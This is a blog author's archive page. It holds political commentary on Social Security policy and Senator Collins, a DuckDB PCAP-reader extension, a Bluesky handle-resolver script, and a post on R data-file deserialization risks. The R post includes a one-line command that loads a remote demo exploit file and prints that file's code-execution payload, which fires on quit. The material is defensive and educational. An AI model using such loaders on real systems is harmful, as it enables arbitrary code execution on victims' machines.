Skip navigation

Author Archives: hrbrmstr

Don't look at me…I do what he does — just slower. #rstats avuncular • ?Resistance Fighter • Cook • Christian • [Master] Chef des Données de Sécurité @ @rapid7

Cruel And Vindictive By Design

(This post originally published on 47 Watch)

Recent administrative changes at the Social Security Administration (SSA) reveal a concerning pattern of decisions that disproportionately impact vulnerable populations while being implemented in ways that limit public awareness and oversight. Two specific policy reversals highlight this trend: the reinstatement of 100% benefit withholding for overpayments and the termination of “Enumeration at Birth” contracts in several states.

The Overpayment Recovery Rate Reversal

On March 7, 2025, the SSA quietly announced it would revert to withholding 100% of monthly benefits from recipients with overpayments, effective March 27, 2025. This reverses a significant reform implemented just one year prior, in March 2024, when the agency reduced the default withholding rate from 100% to 10% of monthly benefits.

The 2024 reform had been implemented specifically to prevent vulnerable beneficiaries from facing homelessness or inability to pay for basic necessities when their entire benefit was withheld. As former Commissioner Martin O’Malley stated, the previous practice was “unconscionable” when it left people “facing homelessness or unable to pay bills, because Social Security withheld their entire payment for recovery of an overpayment.”

Data from the SSA showed the 2024 policy change had measurable positive impacts:

  • The number of people newly placed in full withholding plummeted from 6,771 in February to just 51 in September 2024
  • Approximately 200,000 beneficiaries were able to maintain 90% of their benefits during repayment
 

While beneficiaries can still appeal for hardship waivers to reduce the withholding rate, the appeals process now faces significant delays — reportedly up to 200 days due to staffing shortages at SSA offices. This administrative bottleneck creates a de facto policy of 100% withholding for extended periods, even for those who would qualify for reduced rates.

Acting Commissioner Lee Dudek has framed the reversal as fulfilling the agency’s “significant responsibility to be good stewards of the trust funds for the American people,” estimating the change would increase overpayment recoveries by approximately $7 billion over the next decade.

The Enumeration at Birth Contract Terminations

In a separate but similarly concerning move, the SSA terminated “Enumeration at Birth” contracts with several states, including Maine, in February 2025. These contracts, which had been operating efficiently since 1980, allowed parents to register newborns for Social Security numbers through a simple automated hospital process.

The termination means parents must now physically visit Social Security offices with their newborns and documentation to apply for numbers — a significant burden in rural states like Maine with sparse populations and limited SSA offices. After public backlash and pressure from congressional representatives, Acting Commissioner Dudek issued an apology and claimed he would “reinstate” the contracts.

However, as numerous administrative experts have pointed out, federal contracts cannot simply be “reinstated” after termination. The entire contracting process must start over, which is:

  1. More expensive than maintaining the original contracts
  2. Time-consuming, especially with reduced SSA staff
  3. Creates unnecessary burdens for new parents in the meantime
 

Notably, the contracts were terminated in six states, all of which have Democratic representatives in Congress, suggesting potential political targeting. Maine’s governer — Janet Mills — is also embroiled in a fight with Trump and his administration over rights of transgender citizens.

The terminations were supposedly conducted to save money (approximately $77,000 for a five-year contract base), but will likely result in higher administrative costs, less efficient service delivery, and more work for already-strained Social Security offices.

The Pattern of Administrative Weaponization

Both policy changes share several concerning characteristics:

  1. Quiet implementation: Both were announced with minimal publicity, with the overpayment policy change released late on a Friday, a classic tactic to minimize media coverage.

  2. Disproportionate impact on vulnerable populations: Both changes primarily affect those least equipped to navigate bureaucratic hurdles — elderly and disabled beneficiaries in the case of overpayments, and new parents in rural areas for the Enumeration at Birth terminations.

  3. Administrative roadblocks to relief: While both policies theoretically offer pathways for relief (appeals for overpayment withholding, visiting SSA offices for birth enumeration), administrative realities like extended processing times and limited office locations create de facto barriers.

  4. Questionable fiscal justifications: Both changes are justified as fiscal responsibility measures, yet both may ultimately cost more in administrative overhead and downstream social costs than they save.

  5. Appearance of political targeting: The pattern of states affected by the Enumeration at Birth terminations, along with reports of partisan “hotlines” to expedite certain cases, suggests potentially politically motivated implementation.

These administrative changes highlight how consequential policy shifts can occur not through legislative action but through bureaucratic decisions that receive little public attention or congressional oversight. As these policies take effect in the coming weeks, their impact on vulnerable Social Security beneficiaries and new parents will become increasingly apparent.

Senator Susan Collins’ Betrayal of Maine Demands Accountability

I sent this as an op-ed to the Portland Press Herald but have no delusion they will ACK it or post even a small part of it.

As a longtime Mainer and independent voter, I have watched Senator Susan Collins’ career with cautious optimism, hoping her self-branded image as a moderate willing to cross party lines might translate into principled leadership. Instead, the first six weeks of 2025 have crystallized a painful truth: Collins has become a hollow figurehead, enabling the most destructive elements of Donald Trump’s agenda while abandoning the Mainers she swore to represent. Her recent actions—from rubber-stamping unconstitutional power grabs to greenlighting devastating cuts to healthcare—demand either immediate course correction or resignation.

Collins’ vote to confirm Russell Vought as White House budget director epitomizes her moral bankruptcy. Vought, architect of the “Project 2025” blueprint to concentrate unchecked executive power, openly advocates allowing presidents to ignore congressionally approved spending—a direct threat to Collins’ own role as Senate Appropriations Chair. Her justification—“Presidents deserve broad discretion”—ignores that Vought’s ideology undermines the Constitution’s separation of powers. This is not moderation; it is complicity in authoritarian overreach.

Her tepid opposition to Trump’s FBI director nominee, Kash Patel, further exposes her impotence. While Collins criticized Patel’s “aggressive political activity”, her lone dissent failed to sway colleagues, allowing confirmation of a man who published an “enemies list” of federal employees. Maine deserved a leader who marshals bipartisan resistance to such extremism, not symbolic gestures devoid of consequence.

Collins’ support for the Senate GOP’s February 2025 budget framework reveals her allegiance to party over constituents. The bill slashes $300 billion from Medicaid—a lifeline for 400,000 Mainers, including rural hospitals already teetering on collapse. Her vote alongside Josh Hawley to reject amendments protecting Medicaid contradicts her 2024 boasts about healthcare funding. This hypocrisy will have dire consequences: Maine’s elderly, disabled, and low-income families face reduced coverage, while hospitals risk closure under reimbursement cuts.

Equally alarming is her silence as Trump’s administration weaponizes budget processes to dismantle agencies. Despite chairing Appropriations, Collins has done nothing to stop Elon Musk’s illegal shutdown of USAID offices in February 2025—a move that locked employees out of critical systems. When asked about Musk’s unconstitutional spending freezes, she offered only vague hopes for judicial intervention. Mainers deserve a fighter, not a bystander.

Collins’ failures are not newfound. Her 2020 defense of Trump’s catastrophic COVID-19 response—claiming he “did a lot right”—ignored his months of denial that left Maine vulnerable. Her 2022 vote to confirm Justice Brett Kavanaugh, despite his role in overturning Roe v. Wade, shattered trust with pro-choice Mainers. Now, as constituent letters flood newspapers pleading for accountability, Collins remains aloof, refusing town halls for over two decades.

Her 2025 appropriations role compounds these betrayals. While securing $5 million for wood heaters, she overlooks existential threats: the Kennebec River dredging project, critical for Navy destroyers, remains underfunded, jeopardizing Bath Iron Works jobs. Meanwhile, her committee advances Trump’s deportation raids and education cuts, policies anathema to Maine’s values.

Collins faces a choice: justify her actions with substance or step aside. If she believes slashing Medicaid strengthens Maine, let her hold a town hall in Biddeford and explain it to families relying on insulin coverage. If Musk’s USAID shutdowns align with constitutional duty, let her debate Angus King on live television. Absent such accountability, her continued presence in office insults Mainers’ intelligence.

The 2026 election looms, with forecasters already labeling her seat a toss-up. But Maine cannot wait. We need leaders who prioritize people over political survival, who confront power rather than coddling it. Susan Collins has forfeited that mantle. It is time for her to reclaim it—or make way for someone who will.

When Checks and Balances Fail: The State’s Role in Preserving Constitutional Order

Today, my Senator — Susan Collins — failed in her oath and duty to uphold the Constitution. She voted for the appointment of a traitor to head national intelligence, and is supporting someone for director of the Office of Management and Budget (OMB) who openly wants to dismantle the foundations of American government. She has done nothing to oppose the Administrative coup we’ve been witnessing since POTUS 47 took office. She is now, fully, a willing collaborator. The Executive branch is now nigh irreparably and wholly corrupted, and the Congress is — effectively — on a leash wielded by the POTUS.

The American system of government was designed with multiple layers of protection against the concentration and abuse of power. While we typically focus on federal checks and balances, states play a paramount role as independent sovereigns in our federal system, particularly when federal safeguards falter. Understanding these state powers is essential for maintaining constitutional governance.

The architects of American federalism deliberately created a system where states retain significant independent authority. This includes control over their law enforcement agencies, National Guard units, and the ability to refuse state resources for federal actions. Perhaps most importantly, states maintain the power to prosecute federal officials who act outside their legal authority and violate state laws. These powers weren’t accidents of history — they were deliberately preserved to prevent federal overreach.

Individual states become even more effective when they work together. Through formal interstate compacts and informal coordination, states can create powerful counterweights to federal overreach. This might involve sharing intelligence about illegal federal activities, coordinating legal responses, or pooling resources to resist unconstitutional actions. When multiple states stand together, their collective influence often exceeds the sum of their individual powers.

States control critical infrastructure and resources that federal authorities rely upon to function effectively. This gives states significant practical leverage through their ability to withhold cooperation on federal programs or impose economic consequences on entities that support illegal federal actions. While these powers should be used judiciously, they provide states with concrete tools to resist federal overreach.

Ultimately, the effectiveness of state resistance to federal overreach depends on democratic legitimacy and public support. State officials must be willing to uphold their constitutional oaths, local law enforcement must maintain order under state authority, and citizens must engage in civil resistance to support legitimate government. This democratic foundation is what transforms state powers from theoretical authorities into practical tools for preserving constitutional order.

It’s important to note that state resistance powers come with significant responsibilities. States must exercise these authorities carefully and only in response to genuine constitutional violations, not mere policy disagreements. The goal is to preserve constitutional order, not to create chaos or unnecessarily disrupt legitimate federal operations.

The distributed nature of American governance remains one of our strongest protections against tyranny. While a corrupt federal official might attempt to misuse power, success would require complicity from state and local institutions across the country. By understanding and preserving state powers to resist federal overreach, we maintain essential safeguards for constitutional governance.

The system of checks and balances becomes most critical precisely when it appears to be failing at the federal level. In these moments, state powers of resistance — exercised responsibly and with democratic support — provide crucial backup systems for preserving constitutional order. Understanding these powers helps ensure they remain available when needed most.

Unfortunately, the “Trump 25” states form a solid base of support across four geographic regions:

  • Southern states: North Carolina, South Carolina, Alabama, Mississippi, Louisiana, Arkansas, Oklahoma, Texas
  • Outer South/Industrial Midwest: Kentucky, Tennessee, West Virginia, Ohio, Indiana
  • Plains/Agricultural Midwest: North Dakota, South Dakota, Nebraska, Iowa, Missouri
  • Mountain states: Montana, Wyoming, Idaho, Utah
  • Plus Alaska
     

Several states are taking concrete actions to support federal initiatives:

  • Texas has signed agreements allowing National Guard to make immigration arrests
  • Indiana and Nebraska have directed law enforcement to cooperate with ICE
  • Tennessee approved measures creating state immigration enforcement positions
  • Florida, Texas, and Nevada governors indicated readiness to mobilize National Guard units
     

Republican-led states are advancing legislation to:

  • Expand cooperation with federal immigration enforcement
  • Support deportation efforts
  • Enable information sharing between state and federal agencies
  • Create new state-level enforcement mechanisms
     

This is just the beginning of their willing capitulation to a corrupt regime. It will only get worse.

I call on Maine’s Governor, Janet Mills, to work with the remaining states to do whatever it takes to uphold democratic principles and the rule of law. Without such a coalition, we will most certainly lose our Republic.

CVESky: Monitoring The Bluesky Jetstream For CVE Mentions

I mentioned this new app over at the newsletter but it deserves a mention on the legacy blog.

CVESky is a tool to explore CVE chatter on Bluesky. At work, we’re ingesting the Bluesky Jetstream and watching for CVE chatter, excluding daft bots that just regurgitate new NVD CVEs.

There are six cards for the current and past five days of chatter, with CVEs displayed in descending order of activity. Tapping on a CVE provides details, and the ability to explore the CVE on Bluesky, Feedly, CIRCL’s Vuln Lookup, and — if present in our data — GreyNoise.

At the bottom of the page is a 30-day heatmap of CVE chatter. Tap on any populated square to see all the Bluesky chatter for that CVE.

This is similar to, but slightly different to the most excellent CVE Crowd, which monitors the Mastodonverse for CVE chatter.

The code behind the site also maintains a Bluesky list containing all the folks who chatter about CVEs on Bluesky.

Comments? Questions? Bugs? Feature requests? Hit up research@greynoise.io.

Reading PCAP Files (Directly) With DuckDB

2024-08-30 UPDATE:
Binary versions of this extension are available for amd64 Linux (linux_amd64 & linux_amd64_gcc4) and Apple Silicon. (osx_arm64).

$ duckdb -unsigned
v1.0.0 1f98600c2c
Enter ".help" for usage hints.
Connected to a transient in-memory database.
Use ".open FILENAME" to reopen on a persistent database.
D SET custom_extension_repository='https://w3c2.c20.e2-5.dev/ppcap/latest';
D INSTALL ppcap;
D LOAD ppcap;

2024-08-29 UPDATE: The Apple Silicon macOS and Linux AMD64 versions of the plugin now work with PCAP files that are “Raw IP” vs. just “Ethernet

We generate a ton of PCAP files at $DAYJOB. Since I do not always have to work directly with them, I regularly mix up or forget the various tshark, tcpdump, etc., filters and CLI parameters. While this is less of an issue in the age of LLM/GPTs (just ask local ollama to gen the CLI incantation, and it usually does a good job), each failed command makes me miss Apache Drill just a tad, since it had/has a decent, albeit basic, PCAP reading capability.

For the past few months, I’ve had an “I should build a DuckDB extension to read PCAP files” idea floating in the back of my mind. Thanks to lingering issues from long covid, I’m back in the “let’s wake him up at 0-dark-30 and not let him get back to sleep” routine, so I decided to try to scratch this itch (I was actually hoping super focused work would engender slumber, but that, too, was a big fail).

The DuckDB folks have a spiffy extension template that you can use/fork to get started. It’s been a minute since I’ve had to work in C++ land, and I’m also used to working with system-level, or vendored libraries when doing said work. So, first I had to figure out vcpkg — a C/C++ dependency manager from (ugh) Microsoft — as the DuckDB folks strongly encourage using it (and they use it). You likely do not have to get in the weeds, since there are three lines in the extension template that are (pretty much) all you really need to know/do.

Once that was done, I added libpcap to the DuckDB vcpkg deps. Then, a review of the structure of the example extension and the JSON, CSV, and Parquet reader extensions was in order to get a feel for how to add new functions, and return rectangular data from an entirely new file type.

To get started, I focused on some easy fields: source/destination IPs, timestamp, and payload length and had some oddly great success. So, of course, I had to start a Mastodon thread.

The brilliant minds at DuckDB truly made it pretty straightforward to work with list/array columns, and write new utility functions, so I just kept adding fields and functionality until time ran out (adulting is hard).

At present, the extension exposes the following fields from a PCAP file:

  • timestamp
  • source_ip
  • dest_ip
  • source_port
  • dest_port
  • length
  • tcp_session
  • source_mac
  • dest_mac
  • protocols
  • payload
  • tcp_flags
  • tcp_seq_num

It also has a read_pcap function that supports wildcards or an array of filenames. And, there are three utility functions, one that does a naive test for whether a payload is an HTTP request or response, another that extracts HTTP request headers (if present), and one more that extracts some info from ICMP packets.

Stop Telling Me And Show Me

Fine.

Here’s an incantation that naively converts all HTTP request and response packets to Parquet, since it will always be faster to use Parquet than it will be to use PCAPs:

duckdb -unsigned <<EOF
LOAD ppcap;

COPY (
  FROM 
    read_pcap('scans.pcap')
  SELECT
    *,
    is_http(payload) AS is_http,
    extract_http_request_headers(payload) AS req
) TO 'scans.parquet' (FORMAT PARQUET);
EOF

duckdb -json -s "FROM read_parquet('scans.parquet') WHERE is_http LIMIT 2" | jq
[
  {
    "timestamp": "2024-07-23 16:31:06",
    "source_ip": "94.156.71.207",
    "dest_ip": "203.161.44.208",
    "source_port": 49678,
    "dest_port": 80,
    "length": 154,
    "tcp_session": "94.156.71.207:49678-203.161.44.208:80",
    "source_mac": "64:64:9b:4f:37:00",
    "dest_mac": "00:16:3c:cb:72:42",
    "protocols": "[Ethernet, IP, TCP]",
    "payload": "GET /_profiler/phpinfo HTTP/1.1\\x0D\\x0AHost: 203.161.44.208\\x0D\\x0AUser-Agent: Web Downloader/6.9\\x0D\\x0AAccept-Charset: utf-8\\x0D\\x0AAccept-Encoding: gzip\\x0D\\x0AConnection: close\\x0D\\x0A\\x0D\\x0A",
    "tcp_flags": "[ACK, PSH]",
    "tcp_seq_num": "2072884123",
    "is_http": true,
    "req": "[{'key': Host, 'value': 203.161.44.208}, {'key': User-Agent, 'value': Web Downloader/6.9}, {'key': Accept-Charset, 'value': utf-8}, {'key': Accept-Encoding, 'value': gzip}, {'key': Connection, 'value': close}]"
  },
  {
    "timestamp": "2024-07-23 16:31:06",
    "source_ip": "203.161.44.208",
    "dest_ip": "94.156.71.207",
    "source_port": 80,
    "dest_port": 49678,
    "length": 456,
    "tcp_session": "203.161.44.208:80-94.156.71.207:49678",
    "source_mac": "00:16:3c:cb:72:42",
    "dest_mac": "64:64:9b:4f:37:00",
    "protocols": "[Ethernet, IP, TCP]",
    "payload": "HTTP/1.1 404 Not Found\\x0D\\x0ADate: Tue, 23 Jul 2024 16:31:06 GMT\\x0D\\x0AServer: Apache/2.4.52 (Ubuntu)\\x0D\\x0AContent-Length: 276\\x0D\\x0AConnection: close\\x0D\\x0AContent-Type: text/html; charset=iso-8859-1\\x0D\\x0A\\x0D\\x0A<!DOCTYPE HTML PUBLIC \\x22-//IETF//DTD HTML 2.0//EN\\x22>\\x0A<html><head>\\x0A<title>404 Not Found</title>\\x0A</head><body>\\x0A<h1>Not Found</h1>\\x0A<p>The requested URL was not found on this server.</p>\\x0A<hr>\\x0A<address>Apache/2.4.52 (Ubuntu) Server at 203.161.44.208 Port 80</address>\\x0A</body></html>\\x0A",
    "tcp_flags": "[ACK, PSH]",
    "tcp_seq_num": "2821588265",
    "is_http": true,
    "req": null
  }
]

The reason for ppcap is that I was too lazy to deal with some symbol name collisions (between the extension and libpcap) in a more fancy manner. I’ll eventually figure out how to make it just pcap. PRs welcome.

How Do I Get This?

Well, for now, it’s a bit more complex than an INSTALL ppcap. My extension is not ready for prime time, so it won’t be in the DuckDB community extensions for a while. Which means, you’ll need to install them manually, and also get used to using the -unsigned CLI flag (I’ve aliased that to duckdbu).

NOTE: you need to be running v1.0.0+ of DuckDB for this extension to work.

Here’s how to install it on macOS + Apple Silicon and test to see if it worked:

# where extensions live on macOS + Apple Silicon
mkdir -p ~/.duckdb/extensions/v1.0.0/osx_arm64

# grab and "install" the extension
curl --output ~/.duckdb/extensions/v1.0.0/osx_arm64/ppcap.duckdb_extension https://rud.is/dl/pcap/darwin-arm64/ppcap.duckdb_extension

# this should not output anyting if it worked
duckdb -unsigned -s "load ppcap"

Linux folks can sub out osx_arm64 and darwin-arm64 with linux_amd64 or linux_amd64_gcc4, depending on your system architecture, which you can find via duckdb -s "PRAGMA platform". linux_amd64_gcc4 is the architecture of the Linux amd64/x86_64 binary offered for download from DuckDB-proper.

Source is, sadly, on GitHub: https://github.com/hrbrmstr/duckdb-pcap.

100 Miles

Looks like I’m “back” 💪🏼.

Resolve Bluesky/ATproto Handles To did:plc

Short post just to get the internets to index that I posted a repo with a small Bash script I’ve been using to resolve Bluesky/ATproto handles (like hrbrmstr.dev) to did:plc identifiers. Not sure why I did do this ages ago tbh.

Code is here but it’s small enough to include inline as well:

#!/usr/bin/env bash

set -euo pipefail

# Function to resolve Bluesky handle to DID:PLC
resolve_bluesky_handle() {
  local handle="${1:-}"

  # Remove leading '@' if present
  handle=$(echo "${handle}" | sed -e 's/^@//')

  # Check if curl is installed
  if ! command -v curl &>/dev/null; then
    echo "Error: curl is not installed."
    return 1
  fi

  # Check if jq is installed
  if ! command -v jq &>/dev/null; then
    echo "Error: jq is not installed."
    return 1
  fi

  api_url="https://bsky.social/xrpc/com.atproto.identity.resolveHandle"
  response=$(curl --silent --header "Accept: application/json" "${api_url}?handle=${handle}")

  # Check if the curl command was successful
  if [[ $? -ne 0 ]]; then
    echo "Error: Failed to fetch data from Bluesky API."
    return 1
  fi

  # Extract the DID from the response
  did=$(echo "${response}" | jq -r '.did')

  # Check if jq command was successful
  if [[ $? -ne 0 ]]; then
    echo "Error: Failed to parse JSON response."
    return 1
  fi

  # Check if DID is empty
  if [[ -z "${did}" ]]; then
    echo "Error: DID not found in the response."
    return 1
  fi

  echo "${did}"
}

# Check if exactly one argument is provided
if [[ $# -ne 1 ]]; then
  echo "Usage: $0 <handle>"
  exit 1
fi

resolve_bluesky_handle "${1}"

CVE-2024-27322 Should Never Have Been Assigned And R Data Files Are Still Super Risky Even In R 4.4.0

I had not planned to blog this (this is an incredibly time-crunched week for me) but CERT/CC and CISA made a big deal out of a non-vulnerability in R, and it’s making the round on socmed, so here we are.

A security vendor decided to try to get some hype before 2024 RSAC and made a big deal out of what was/is known expected behavior in R data files. R Core took some measures to address the issue they outlined, but for the love of Henry, PLEASE do not think R data files are safe to handle if you weren’t the one creating them, or you do not fully know the provenance of them.

Konrad Rudolph and Iakov Davydov did some ace cyber sleuthing and figured out other ways R data file deserialization can be abused. Please take a moment and drop a note on Mastodon to them saying “thank you”. This is excellent work. We need more folks like them in this ecosystem.

Like many programming languages, R has many footguns, and R data files are one of them. R objects are wonderful beasts, and being able to serialize and deserialize those beasts is a super helpful bit of functionality. Also, R has something called active bindings. Amongst other things, they let you access an object to get a value, but — in doing so — code can get executed without you knowing it. Whether an R data file has an object with active bindings or not, it can be abused by attackers.

When you load() an R data file directly into your R session and into the global environment, the object(s) in it will, well, load there. So, if it has an object named print that’s going to be in your global environment and get called when print() gets called. Lather/rinse/repeat for any other object name. It should be pretty obvious how this could be abused.

A tad more insidious is what happens when you quit R. By default, on quit(), unless you specify otherwise, that function invocation will also call .Last() if it exists in the environment. This functionality exists in the event things need to be cleaned up. One “nice” aspect of .-prefixed R objects is that they’re hidden by default from the environment. So, you may not even notice if an R data file you’ve loaded has that defined. (You likely do not check what’s loaded anyway.)

It’s also possible to create custom R objects that have their own “finalizers” (ref reg.finalizer), which will also get called by default when the objects are being destroyed on quit.

There are also likely other ways to trigger unwanted behavior.

If you want to see how this works, start R from RStudio, the command line, or R GUI. Then, execute the following R code:

load(url("https://github.com/hrbrmstr/rdaradar/raw/main/exploit.rda"))

Then, quit R/RStudio/R GUI (this will be less dramatic on linux, but the demo should still be effective).

If you must take in untrusted R data files, keep reading.

I threw together an R script along with a safer way to use it (a Docker container) to help R folks inspect the contents of R data files before actually using them. It also looks for some basic shady stuff and alerts you if it finds them. It’s a WIP, and issues + thoughtful PRs are welcome.

If one were to run Rscript check.R from that repo with that exploit.rda file as a parameter, one would see this:

-----------------------------------------------
Loading R data file in quarantined environment…
-----------------------------------------------

Loading objects:
  .Last
  quit

-----------------------------------------
Enumerating objects in loaded R data file
-----------------------------------------

.Last : function (...)  
 - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6
  ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile' <environment: 0x12cb25f48> 
quit : function (...)  
 - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6
  ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile' <environment: 0x12cb25f48> 

------------------------------------
Functions found: enumerating sources
------------------------------------

Checking `.Last`…

!! `.Last` may execute arbitrary code on your system under certain conditions !!

`.Last` source:
{
    cmd = if (.Platform$OS.type == "windows") 
        "calc.exe"
    else if (grepl("^darwin", version$os)) 
        "open -a Calculator.app"
    else "echo pwned\\!"
    system(cmd)
}


Checking `quit`…

!! `quit` may execute arbitrary code on your system under certain conditions !!

`quit` source:
{
    cmd = if (.Platform$OS.type == "windows") 
        "calc.exe"
    else if (grepl("^darwin", version$os)) 
        "open -a Calculator.app"
    else "echo pwned\\!"
    system(cmd)
}

There’s info in the repo on how to use that with Docker.

FIN

The big takeaway is (again) to not trust R data files you did not create or know the full provenance of. If you have an internet-facing Shiny app or Plumber API that takes R data files as input, get it off the internet and figure out some other way to take in the input.

While I fully disagree with the assignment of the CVE, I’m at least glad this situation brought attention to this very dangerous aspect of handling this type of file format in R.